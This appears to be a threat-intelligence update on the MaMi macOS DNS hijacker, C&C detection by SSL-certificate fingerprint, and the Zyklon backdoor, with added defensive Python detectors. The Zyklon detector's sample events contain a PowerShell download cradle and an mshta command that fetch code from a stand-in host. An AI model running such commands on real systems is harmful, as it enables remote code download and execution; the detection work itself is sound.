MaMi is a macOS DNS hijacker discovered in January 2018. It appears to be the first DNS hijacker seen on this platform.

The malware is distributed inside macOS installer images (.dmg). It adds two attacker-controlled DNS servers (82.163.143[.]135 and 82.163.142[.]137), installs a malicious root certificate so that traffic to the spoofed hosts can be intercepted, and persists the DNS change through a routine that periodically rewrites the system's resolver settings, so simply removing the entries is not enough. Beyond DNS hijacking, the sample can take screenshots, generate mouse events, download and upload files, execute commands, and elevate privileges.
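A quick host-side check for the resolver change described above, as an added example that is not part of the original update and not the vendor's detection logic: it parses the output of `scutil --dns` (the sample below is constructed, not a real capture) and reports any configured nameserver that matches the two MaMi addresses. The IOC set and the sample output are the only assumptions; the live check at the bottom simply runs the same parser over the real command on a Mac.

```python
import re
import subprocess

# Nameservers attributed to OSX/MaMi in the write-up above (defanged there, usable here).
MAMI_DNS_IOCS = {"82.163.143.135", "82.163.142.137"}

# Constructed sample of `scutil --dns` output: resolver #1 has been hijacked,
# the scoped resolver still points at the local router. Not a real capture.
SAMPLE_SCUTIL_OUTPUT = """\
DNS configuration

resolver #1
  search domain[0] : corp.example
  nameserver[0] : 82.163.143.135
  nameserver[1] : 82.163.142.137
  if_index : 4 (en0)
  flags    : Request A records
  reach    : 0x00000002 (Reachable)

resolver #2
  domain   : local
  options  : mdns
  timeout  : 5
  flags    : Request A records
  reach    : 0x00000000 (Not Reachable)
  order    : 300000

DNS configuration (for scoped queries)

resolver #1
  nameserver[0] : 192.168.1.1
  if_index : 4 (en0)
  flags    : Scoped, Request A records
  reach    : 0x00000002 (Reachable)
"""

# Matches lines such as "  nameserver[0] : 82.163.143.135" in scutil output.
_NS_RE = re.compile(r"^\s*nameserver\[\d+\]\s*:\s*(\S+)", re.MULTILINE)


def parse_nameservers(scutil_output):
    """Return every nameserver address listed in `scutil --dns` output, in order."""
    return _NS_RE.findall(scutil_output)


def find_hijacked_resolvers(scutil_output, iocs=MAMI_DNS_IOCS):
    """Return configured nameservers that match the IOC set (deduplicated, in order of appearance)."""
    hits = []
    for ns in parse_nameservers(scutil_output):
        if ns in iocs and ns not in hits:
            hits.append(ns)
    return hits


def check_live_host(iocs=MAMI_DNS_IOCS):
    """Run `scutil --dns` on the local macOS host and return matching IOC nameservers."""
    out = subprocess.run(["scutil", "--dns"], capture_output=True, text=True, check=True).stdout
    return find_hijacked_resolvers(out, iocs)


if __name__ == "__main__":
    print("sample output:", find_hijacked_resolvers(SAMPLE_SCUTIL_OUTPUT) or "clean")
    try:
        print("this host:", check_live_host() or "clean")
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("this host: scutil not available (not macOS?)")
```

Because the malware re-applies its settings periodically, a clean result from a single run is not conclusive; run the check again a few minutes later, and also review the System keychain (`security find-certificate -a /Library/Keychains/System.keychain`) for a root certificate you did not install.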

A Windows counterpart, DNSUnlocker, has been around since 2015. Like MaMi, it points the system at the same two DNS servers and installs a malicious root certificate, which is why the two are treated as related.

We've added the following correlation rule to detect this activity:

System Compromise, Trojan infection, OSX/Mami

Added Detection Technique – Malware SSL Certificates

We've added new IDS signatures for additional certificates that the Abuse.ch SSL Blacklist (SSLBL) associates with malware or botnet activity. The updated correlation rules use these certificate fingerprints to detect command and control (C&C) communications for several malware families, including:

System Compromise, C&C Communication, Lazarus SSL Certificate

System Compromise, C&C Communication, Adwind SSL Certificate
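To show what fingerprint-based C&C detection looks like in practice, here is an added example (not the vendor's signatures or correlation engine). It loads a block list in the Abuse.ch SSLBL CSV layout (Listingdate,SHA1,Listingreason) and matches it against Suricata EVE-style TLS events, whose `tls.fingerprint` field carries the SHA1 of the server certificate. Both the block-list entries and the events are constructed for this example; the fingerprints are made up and are not real SSLBL listings, and the rule names are formed from the listing reason to mirror the naming used on this page.

```python
import csv
import json

# Constructed block list in the abuse.ch SSLBL CSV layout. These SHA1 values are
# invented for the example and are NOT real SSLBL entries.
SAMPLE_SSLBL_CSV = """\
# abuse.ch SSLBL (constructed sample, not real data)
# Listingdate,SHA1,Listingreason
2018-01-15 09:12:44,0123456789abcdef0123456789abcdef01234567,Lazarus C&C
2018-01-16 14:03:10,89abcdef0123456789abcdef0123456789abcdef,Adwind C&C
"""

# Constructed Suricata EVE-style events. Only event_type "tls" carries a
# certificate fingerprint (colon-separated SHA1, case varies between sensors).
SAMPLE_EVE_LINES = [
    '{"timestamp":"2018-01-20T10:00:01","event_type":"tls","src_ip":"10.0.0.5","dest_ip":"203.0.113.7","dest_port":443,'
    '"tls":{"subject":"CN=update.example","fingerprint":"01:23:45:67:89:ab:cd:ef:01:23:45:67:89:ab:cd:ef:01:23:45:67"}}',
    '{"timestamp":"2018-01-20T10:00:02","event_type":"tls","src_ip":"10.0.0.9","dest_ip":"198.51.100.2","dest_port":443,'
    '"tls":{"subject":"CN=www.example.org","fingerprint":"ff:ee:dd:cc:bb:aa:99:88:77:66:55:44:33:22:11:00:ff:ee:dd:cc"}}',
    '{"timestamp":"2018-01-20T10:00:03","event_type":"dns","src_ip":"10.0.0.9","dest_ip":"10.0.0.1"}',
    '{"timestamp":"2018-01-20T10:00:04","event_type":"tls","src_ip":"10.0.0.5","dest_ip":"192.0.2.33","dest_port":8443,'
    '"tls":{"subject":"CN=jrat","fingerprint":"89:AB:CD:EF:01:23:45:67:89:AB:CD:EF:01:23:45:67:89:AB:CD:EF"}}',
]


def normalize_sha1(fp):
    """Canonical form for comparison: no colons, lowercase hex."""
    return fp.replace(":", "").strip().lower()


def load_sslbl(csv_text):
    """Map normalized SHA1 fingerprint -> listing reason, skipping comment lines and malformed rows."""
    rows = (line for line in csv_text.splitlines() if line and not line.startswith("#"))
    blocklist = {}
    for row in csv.reader(rows):
        if len(row) != 3:
            continue
        _listing_date, sha1, reason = row
        fp = normalize_sha1(sha1)
        if len(fp) == 40:
            blocklist[fp] = reason
    return blocklist


def family_from_reason(reason):
    """SSLBL reasons read '<family> <role>' (e.g. 'Lazarus C&C'); the family is the first token."""
    return reason.split()[0]


def match_tls_events(eve_lines, blocklist):
    """Return one alert per TLS event whose server certificate fingerprint is on the block list."""
    alerts = []
    for line in eve_lines:
        ev = json.loads(line)
        if ev.get("event_type") != "tls":
            continue
        fp = normalize_sha1(ev.get("tls", {}).get("fingerprint", ""))
        reason = blocklist.get(fp)
        if reason is None:
            continue
        alerts.append({
            "rule": "System Compromise, C&C Communication, %s SSL Certificate" % family_from_reason(reason),
            "src_ip": ev["src_ip"],
            "dest_ip": ev["dest_ip"],
            "dest_port": ev["dest_port"],
            "sha1": fp,
            "reason": reason,
        })
    return alerts


if __name__ == "__main__":
    for alert in match_tls_events(SAMPLE_EVE_LINES, load_sslbl(SAMPLE_SSLBL_CSV)):
        print(alert["rule"], "|", alert["src_ip"], "->", alert["dest_ip"], alert["dest_port"], "|", alert["reason"])
```

Normalizing the fingerprint before lookup matters: sensors disagree on colons and letter case, and the fourth sample event only matches because of it. Matching on the certificate rather than the destination IP is what lets the same rule keep firing when the operators move their C&C server but reuse the certificate.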

Updated Detection Technique – Trojan Infection

We've updated the following correlation rules as a result of additional recent malicious activity:

Zyklon is a publicly available HTTP-based backdoor, first observed in the wild in 2016, that has been distributed in recent campaigns by exploiting newly disclosed Microsoft Office vulnerabilities. It provides keylogging, password harvesting, distributed denial-of-service attacks, and self-update and self-removal, and it communicates with its C&C server anonymously over the Tor network.

Like other variants of the family, it can download and run executables, steal passwords from web browsers, and mine cryptocurrency. The most common infection vector is a spam email carrying a ZIP attachment that contains a malicious DOC file; when the document is opened, the exploit runs a PowerShell script that downloads the Zyklon payload. The vulnerabilities most commonly exploited by Zyklon are CVE-2017-8759 and CVE-2017-11882.
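The infection chain above (Office document, exploit, PowerShell download) leaves a process-tree footprint that is easy to alert on regardless of which Zyklon sample was used. The following is an added example, not the vendor's correlation rule: it scans Sysmon-style process-creation records (constructed here, with the field names Sysmon Event ID 1 uses: `ParentImage`, `Image`, `CommandLine`) for Office applications spawning script hosts, for EQNEDT32.EXE spawning anything at all (the Equation Editor is the process that CVE-2017-11882 exploitation lands in, and it has no legitimate reason to launch children), and for encoded PowerShell that decodes to a download cradle. The marker lists and the sample events are assumptions made for the example; the encoded command is built with the same UTF-16LE/Base64 encoding PowerShell expects for -EncodedCommand.

```python
import base64
import binascii
import ntpath
import re

# Parents whose script-host children are suspicious (assumed list for this example).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Equation Editor should never spawn a child; CVE-2017-11882 exploitation makes it do so.
EQUATION_EDITOR = "eqnedt32.exe"
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                       "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Substrings typical of PowerShell download cradles (assumed list, matched as whole tokens).
DOWNLOAD_CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-expression", "iex",
                           "net.webclient", "frombase64string", "start-bitstransfer")
# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the value is Base64 of UTF-16LE text.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden")


def _ps_encode(script):
    """Encode a script the way PowerShell expects it for -EncodedCommand (used only to build the sample)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + _ps_encode(CRADLE)},
    {"Computer": "WS02", "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c mshta http://example.invalid/a.hta"},
    {"Computer": "WS03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
    {"Computer": "WS04", "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},   # print spooler helper: a normal Word child
]


def _basename(path):
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is not valid Base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16le", errors="replace")


def _cradle_markers(text):
    low = text.lower()
    return [m for m in DOWNLOAD_CRADLE_MARKERS
            if re.search(r"(?<![a-z0-9])" + re.escape(m) + r"(?![a-z0-9])", low)]


def analyze_event(ev):
    """Return an alert dict for a suspicious Office/Equation Editor child process, else None."""
    parent, child = _basename(ev.get("ParentImage", "")), _basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    reasons = []
    if parent == EQUATION_EDITOR:
        reasons.append("Equation Editor (EQNEDT32.EXE) spawned a child process")
    elif parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        reasons.append("%s spawned %s" % (parent, child))
    if not reasons:
        return None
    decoded = decode_encoded_command(cmdline) if child == "powershell.exe" else None
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    markers = _cradle_markers(decoded if decoded is not None else cmdline)
    if markers:
        reasons.append("download cradle markers: " + ", ".join(markers))
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden window")
    return {"computer": ev.get("Computer"), "parent": parent, "child": child,
            "decoded": decoded, "reasons": reasons}


def scan_events(events):
    alerts = []
    for ev in events:
        alert = analyze_event(ev)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(a["computer"], a["parent"], "->", a["child"], "|", "; ".join(a["reasons"]))
        if a["decoded"]:
            print("    decoded:", a["decoded"])
```

Decoding the -EncodedCommand value before matching is the important step: the cradle's `DownloadString` never appears in the raw command line, so a rule that only pattern-matches the command line would see nothing but a Base64 blob. The WS04 event shows why the child-process allow-list matters; Word launching splwow64.exe for printing is routine and should not page anyone.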

We've added IDS signatures and the following correlation rule to detect this activity:

System Compromise, Trojan infection, Zyklon

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity: